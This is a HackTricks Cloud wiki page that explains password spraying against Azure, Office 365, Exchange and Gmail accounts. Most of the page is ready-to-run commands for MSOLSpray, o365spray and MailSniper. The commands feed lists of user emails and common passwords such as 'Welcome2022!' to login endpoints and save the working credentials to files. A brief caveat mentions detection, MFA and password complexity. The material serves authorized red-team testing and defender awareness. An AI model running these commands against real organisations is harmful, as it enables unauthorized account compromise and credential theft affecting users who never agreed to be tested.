HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Password Spray

In Azure this can be done against different API endpoints like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.

However, note that this technique is very noisy and Blue Team can easily catch it. Moreover, forced password complexity and the use of MFA can make this technique kind of useless.

You can perform a password spray attack with MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Or with o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Or with MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAz - Device Code Authentication PhishingNextAz - Services

Last updated